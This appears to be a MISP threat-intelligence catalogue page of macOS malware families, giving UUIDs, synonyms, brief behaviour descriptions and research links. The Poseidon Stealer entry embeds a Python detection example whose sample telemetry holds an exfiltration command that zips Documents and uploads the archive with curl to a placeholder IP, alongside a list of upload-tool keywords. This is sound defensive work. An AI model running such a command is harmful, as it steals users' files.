MacSpy
Internal MISP references
UUID c9915d41-d1fb-45bc-997e-5cd9c573d8e7
which can be used as unique global reference for MacSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MacVX
Internal MISP references
UUID 4db9012b-d3a1-4f19-935c-4dbc7fdd93fe
which can be used as unique global reference for MacVX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MaMi
Internal MISP references
UUID 7759534c-3298-42e9-adab-896d7e507f4f
which can be used as unique global reference for MaMi
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Manuscrypt
Internal MISP references
UUID f85c3ec9-81f0-4dee-87e6-b3f6b235bfe7
which can be used as unique global reference for Manuscrypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt - webarchive
- https://twitter.com/BitsOfBinary/status/1337330286787518464 - webarchive
- https://www.anquanke.com/post/id/223817 - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://twitter.com/BitsOfBinary/status/1321488299932983296 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mokes (OS X)
Internal MISP references
UUID bfbb6e5a-32dc-4842-936c-5d8497570c74
which can be used as unique global reference for Mokes (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes - webarchive
- https://objective-see.com/blog/blog_0x16.html - webarchive
- https://objective-see.com/blog/blog_0x53.html - webarchive
- https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mughthesec
Internal MISP references
UUID aa1bf4e5-9c44-42a2-84e5-7526e4349405
which can be used as unique global reference for Mughthesec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetWire
Internal MISP references
UUID f0d52afd-e7c9-4bd1-be8a-9ab09b14ea24
which can be used as unique global reference for NetWire
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OceanLotus
According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.
The OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).
Internal MISP references
UUID 65b7eff4-741c-445e-b4e0-8a4e4f673a65
which can be used as unique global reference for OceanLotus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/ - webarchive
- https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/ - webarchive
- https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam - webarchive
- https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html - webarchive
- https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html - webarchive
- https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/ - webarchive
- https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/ - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update - webarchive
- https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468 - webarchive
- https://brandefense.io/blog/apt-groups/ocean-lotus-apt-group/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Olyx
Internal MISP references
UUID cd397973-8f42-4c49-8322-414ea77ec773
which can be used as unique global reference for Olyx
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
oRAT
SentinelOne describes this as a malware written in Go, mixing own custom code with code from public repositories.
Internal MISP references
UUID 699dac0f-092c-4c8e-85e9-6e3c86129190
which can be used as unique global reference for oRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.orat - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://www.sentinelone.com/blog/from-the-front-lines-unsigned-macos-orat-malware-gambles-for-the-win/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OSAMiner
Internal MISP references
UUID 89d0c423-c4ff-46e8-8c79-ea5e974e53e7
which can be used as unique global reference for OSAMiner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Patcher
This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software such as Adobe Premiere Pro or Microsoft Office for Mac.
The downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.
The file encryption process started after the unsuspecting victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user's files. It then demanded a ransom in Bitcoin, as instructed in the 'README!.txt' file copied all over the user's directories.
Although the instructions were quite thorough, Patcher had no functionality to communicate with any C&C server, so the key never left the victim's machine and its operators had no way to decrypt affected files. The randomly generated key was also too long to be recovered by brute force, leaving the encrypted data unrecoverable in any reasonable amount of time.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Patcher.
Known Synonyms |
---|
FileCoder |
Findzip |
Internal MISP references
UUID bad1057c-4f92-4747-a0ec-31bcc062dab8
which can be used as unique global reference for Patcher
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PintSized
Backdoor built as a fork of OpenSSH 6.0 with logging removed and hidden "-P" and "-z" command-line arguments. Contains the string "PuffySSH_5.8p1".
Internal MISP references
UUID de13bec0-f443-4c5a-91fe-2223dad43be5
which can be used as unique global reference for PintSized
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pirrit
Internal MISP references
UUID b749ff3a-df68-4b38-91f1-649864eae52c
which can be used as unique global reference for Pirrit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit - webarchive
- http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf - webarchive
- https://forensicitguy.github.io/analyzing-pirrit-adware-installer/ - webarchive
- http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/ - webarchive
- https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POOLRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POOLRAT.
Known Synonyms |
---|
SIMPLESEA |
SIMPLETEA |
Internal MISP references
UUID bfd9e30e-ddc7-426f-8f77-4d2e1a846541
which can be used as unique global reference for POOLRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.poolrat - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment - webarchive
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e - webarchive
- https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://www.3cx.com/blog/news/mandiant-security-update2/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poseidon (OS X)
Poseidon is an agent for the Mythic C2 framework, written in Go.
Internal MISP references
UUID e4ac9105-c3ad-41e2-846b-048e2bbedc6a
which can be used as unique global reference for Poseidon (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poseidon Stealer
macOS infostealer sold by an individual using the handle Rodrigo4. At the time of writing it consists of a disk image containing a bare Mach-O binary (no app bundle) which, when executed, spawns osascript to run an AppleScript carrying the actual infostealer payload. The AppleScript steals files by packing them into a ZIP archive and uploading it to a hardcoded C2 over HTTP.
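The chain described above (a bare Mach-O run from a mounted disk image that spawns osascript, whose inline AppleScript shells out to archive and upload files) can be spotted from process telemetry alone. The following is an added detection example, not code from the page or from the cited reports: it walks a list of process events, ties each osascript to its parent, and flags the two traits. The events, the disk-image path, the script body and the TEST-NET address 203.0.113.10 are all constructed for the example.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    path: str      # on-disk path of the executable
    cmdline: str   # full command line as logged


# Constructed process telemetry (hypothetical, not captured from an infection).
# pid 501 plays the bare Mach-O launched from a mounted DMG; pid 502 is the
# osascript it spawns with an inline script that archives files and pushes
# them to a web server. The Script Editor / osascript pair is benign contrast.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "/sbin/launchd", "/sbin/launchd"),
    ProcEvent(300, 1, "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder", "Finder"),
    ProcEvent(501, 300, "/Volumes/Installer/Launcher", "/Volumes/Installer/Launcher"),
    ProcEvent(502, 501, "/usr/bin/osascript",
              "osascript -e 'do shell script \"cd ~/Documents && zip -r /tmp/out.zip . "
              "&& curl -X POST --data-binary @/tmp/out.zip http://203.0.113.10/upload\"'"),
    ProcEvent(600, 300, "/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
              "Script Editor"),
    ProcEvent(601, 600, "/usr/bin/osascript", "osascript /Users/alice/hello.scpt"),
]

# Shell tools an inline AppleScript would call to archive and upload data.
EXFIL_TOOLS = ("curl ", "zip ", "ditto ")


def bare_binary_on_disk_image(path: str) -> bool:
    """True for an executable run straight from a mounted DMG outside any .app bundle."""
    return path.startswith("/Volumes/") and ".app/" not in path


def suspicious_osascript(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Flag osascript processes whose parent is a bare binary on a disk image
    and/or whose inline script shells out to archive/upload tools."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings = []
    for e in events:
        if not e.path.endswith("/osascript"):
            continue
        reasons = []
        parent = by_pid.get(e.ppid)
        if parent and bare_binary_on_disk_image(parent.path):
            reasons.append("parent is a bare Mach-O on a mounted disk image")
        cmd = e.cmdline.lower()
        if "do shell script" in cmd and any(t in cmd for t in EXFIL_TOOLS):
            reasons.append("inline AppleScript shells out to archive/upload tools")
        if reasons:
            findings.append((e.pid, reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in suspicious_osascript(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Either trait on its own is noisy (developers run osascript from Script Editor all day; installers on DMGs are normal), so a production rule would weight the combination and add the outbound HTTP POST from the curl child as a third signal.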
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poseidon Stealer.
Known Synonyms |
---|
Rodrigo Stealer |
Internal MISP references
UUID 9eb9f899-acfb-4452-981f-5937aa1f47cc
which can be used as unique global reference for Poseidon Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.poseidonstealer - webarchive
- https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads - webarchive
- https://github.com/govcert-ch/CTI/tree/main/20240627_macOS_PoseidonStealer - webarchive
- https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2024/poseidon_bericht.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Proton RAT
Proton RAT is a Remote Access Trojan (RAT) built specifically for macOS. It gives attackers full remote control over the infected system: command execution, keystroke capture, access to the camera and microphone, and theft of credentials stored in browsers and other password managers. It typically spreads through malicious or trojanized applications which, once downloaded and installed by unsuspecting users, trigger its payload. Proton RAT is known for its sophistication and evasion capabilities, including techniques to bypass detection by installed security solutions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Proton RAT.
Known Synonyms |
---|
Calisto |
Internal MISP references
UUID d7e31f19-8bf2-4def-8761-6c5bf7feaa44
which can be used as unique global reference for Proton RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat - webarchive
- https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/ - webarchive
- https://objective-see.com/blog/blog_0x1D.html - webarchive
- https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does - webarchive
- https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/ - webarchive
- https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/ - webarchive
- https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf - webarchive
- https://securelist.com/calisto-trojan-for-macos/86543/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/ - webarchive
- https://objective-see.com/blog/blog_0x1F.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pwnet
Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.
Internal MISP references
UUID 70059ec2-9315-4af7-b65b-2ec35676a7bb
which can be used as unique global reference for Pwnet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dok
Dok, a.k.a. Retefe, is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper, usually malspammed in an app bundle within a DMG disk image and posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy PAC URL, in order to redirect traffic to targeted sites through the attackers' Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dok.
Known Synonyms |
---|
Retefe |
Internal MISP references
UUID 80acc956-d418-42e3-bddf-078695a01289
which can be used as unique global reference for Dok
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe - webarchive
- https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe - webarchive
- https://www.govcert.admin.ch/blog/33/the-retefe-saga - webarchive
- https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/ - webarchive
- http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RustBucket (OS X)
Internal MISP references
UUID 03f356e6-296f-4195-bed0-9719a84887db
which can be used as unique global reference for RustBucket (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.rustbucket - webarchive
- https://sansorg.egnyte.com/dl/3P3HxFiNgL - webarchive
- https://securelist.com/bluenoroff-new-macos-malware/111290/ - webarchive
- https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/ - webarchive
- https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html - webarchive
- https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket - webarchive
- https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shlayer
According to PCrisk, Shlayer is a trojan-type virus designed to proliferate various adware and other unwanted applications, and to promote fake search engines. It is typically disguised as an Adobe Flash Player installer or as various software cracking tools.
In most cases, users encounter this virus when visiting dubious Torrent websites that are full of intrusive advertisements and deceptive downloads.
Internal MISP references
UUID c3ee82df-a004-4c68-89bd-eb4bb2dfc803
which can be used as unique global reference for Shlayer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://securelist.com/shlayer-for-macos/95724/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://objective-see.com/blog/blog_0x64.html - webarchive
- https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/ - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities - webarchive
- https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/ - webarchive
- https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508 - webarchive
- https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/ - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Silver Sparrow
According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.
Internal MISP references
UUID f6a7aeeb-fcc5-4d26-9eab-c0b6e2819a6c
which can be used as unique global reference for Silver Sparrow
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SimpleTea (OS X)
SimpleTea is a RAT for macOS that is based on the same object-oriented project as SimpleTea for Linux (SimplexTea).
It also shares similarities with POOLRAT (also known as SIMPLESEA), like the supported commands or a single-byte XOR encryption of its configuration. However, the indices of commands are different.
SimpleTea for macOS was uploaded to VirusTotal from Hong Kong and China in September 2023.
Internal MISP references
UUID ce384804-8580-4d57-97b3-bde0d903f703
which can be used as unique global reference for SimpleTea (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpectralBlur (OS X)
Internal MISP references
UUID c7c32006-a2d1-4bc2-8a25-84c07286464a
which can be used as unique global reference for SpectralBlur (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SUGARLOADER
Internal MISP references
UUID 171501fd-d504-4257-9c3d-fbc066d6eeba
which can be used as unique global reference for SUGARLOADER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SysJoker (OS X)
Internal MISP references
UUID 5bffe0fe-22f6-4d18-9372-f8c5d262d852
which can be used as unique global reference for SysJoker (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.sysjoker - webarchive
- https://www.sentinelone.com/blog/sneaky-spies-and-backdoor-rats-sysjoker-and-dazzlespy-malware-target-macos/ - webarchive
- https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html - webarchive
- https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/ - webarchive
- https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
systemd
General purpose backdoor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular systemd.
Known Synonyms |
---|
Demsty |
ReverseWindow |
Internal MISP references
UUID a8e7687b-9db7-4606-ba81-320d36099e3a
which can be used as unique global reference for systemd
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tsunami (OS X)
Internal MISP references
UUID 59d4a2f3-c66e-4576-80ab-e04a4b0a4317
which can be used as unique global reference for Tsunami (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified macOS 001 (UnionCryptoTrader)
Internal MISP references
UUID 1c96f6b9-6b78-4137-9d5f-aa5575f80daa
which can be used as unique global reference for Unidentified macOS 001 (UnionCryptoTrader)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001 - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment - webarchive
- https://securelist.com/operation-applejeus-sequel/95596/ - webarchive
- https://objective-see.com/blog/blog_0x51.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UpdateAgent
Internal MISP references
UUID 1f1bc885-5987-41fa-bb04-8775eeb45d88
which can be used as unique global reference for UpdateAgent
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.update_agent - webarchive
- https://twitter.com/sysopfb/status/1532442456343691273 - webarchive
- https://www.jamf.com/blog/updateagent-adapts-again/ - webarchive
- https://www.esentire.com/blog/updateagent-macos-malware - webarchive
- https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Uroburos (OS X)
Internal MISP references
UUID 13173d75-45f0-4183-8e18-554a5781405c
which can be used as unique global reference for Uroburos (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vigram
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vigram.
Known Synonyms |
---|
WizardUpdate |
Internal MISP references
UUID 021e2fb4-1744-4fde-8d59-b247f1b34062
which can be used as unique global reference for Vigram
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram - webarchive
- https://twitter.com/MsftSecIntel/status/1451279679059488773 - webarchive
- https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/ - webarchive
- https://twitter.com/ConfiantIntel/status/1351559054565535745 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WatchCat
Internal MISP references
UUID a73468d5-2dee-4828-8bbb-c37ea9295584
which can be used as unique global reference for WatchCat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WindTail
Internal MISP references
UUID 48751182-0b17-4326-8a72-41e4c4be35e7
which can be used as unique global reference for WindTail
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail - webarchive
- https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/ - webarchive
- https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56 - webarchive
- https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/ - webarchive
- https://objective-see.com/blog/blog_0x3B.html - webarchive
- https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf - webarchive
- https://objective-see.com/blog/blog_0x3D.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Winnti (OS X)
Internal MISP references
UUID 5aede44b-1a30-4062-bb97-ac9f4985ddb6
which can be used as unique global reference for Winnti (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WireLurker (OS X)
Internal MISP references
UUID bc32df24-8e80-44bc-80b0-6a4d55661aa5
which can be used as unique global reference for WireLurker (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Wirenet (OS X)
Internal MISP references
UUID f99ef0dc-9e96-42e0-bbfe-3616b3786629
which can be used as unique global reference for Wirenet (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
X-Agent (OS X)
Internal MISP references
UUID 858f4396-8bc9-4df8-9370-490bbb3b4535
which can be used as unique global reference for X-Agent (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent - webarchive
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://twitter.com/PhysicalDrive0/status/845009226388918273 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XCSSET
Internal MISP references
UUID 041aee7f-cb7a-4199-9fe5-494801a18273
which can be used as unique global reference for XCSSET
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/ - webarchive
- https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/ - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities - webarchive
- https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html - webarchive
- https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf - webarchive
- https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/ - webarchive
- https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xloader
Xloader is a rebranding of the Formbook malware (mainly a stealer) and is available for macOS as well.
Formbook has a "magic"-value FBNG (FormBook-NG), while Xloader has a "magic"-value XLNG (XLoader-NG). This "magic"-value XLNG is platform-independent.
Not to be confused with apk.xloader or ios.xloader.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xloader.
Known Synonyms |
---|
Formbook |
Internal MISP references
UUID d5f2f6ad-2ed0-42d4-9116-f95eea2ab543
which can be used as unique global reference for Xloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader - webarchive
- https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/ - webarchive
- https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/ - webarchive
- https://medium.com/@shaddy43/layers-of-deception-analyzing-the-complex-stages-of-xloader-4-3-malware-evolution-2dcb550b98d9 - webarchive
- https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/ - webarchive
- https://www.lac.co.jp/lacwatch/report/20220307_002893.html - webarchive
- https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/ - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/ - webarchive
- https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/ - webarchive
- https://twitter.com/krabsonsecurity/status/1319463908952969216 - webarchive
- https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption - webarchive
- https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/ - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer - webarchive
- https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XSLCmd
Internal MISP references
UUID 120a5890-dc3e-42e8-950e-b5ff9a849d2a
which can be used as unique global reference for XSLCmd
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yort
Internal MISP references
UUID 725cd3eb-1025-4da3-bcb1-a7b6591c632b
which can be used as unique global reference for Yort
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZuRu
A malware that was observed being embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites pushed in search engines. It uses a Python script to perform reconnaissance on the compromised system and pulls additional payload(s).
Internal MISP references
UUID bd293592-d2dd-4fdd-88e7-6098e0bbb043
which can be used as unique global reference for ZuRu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
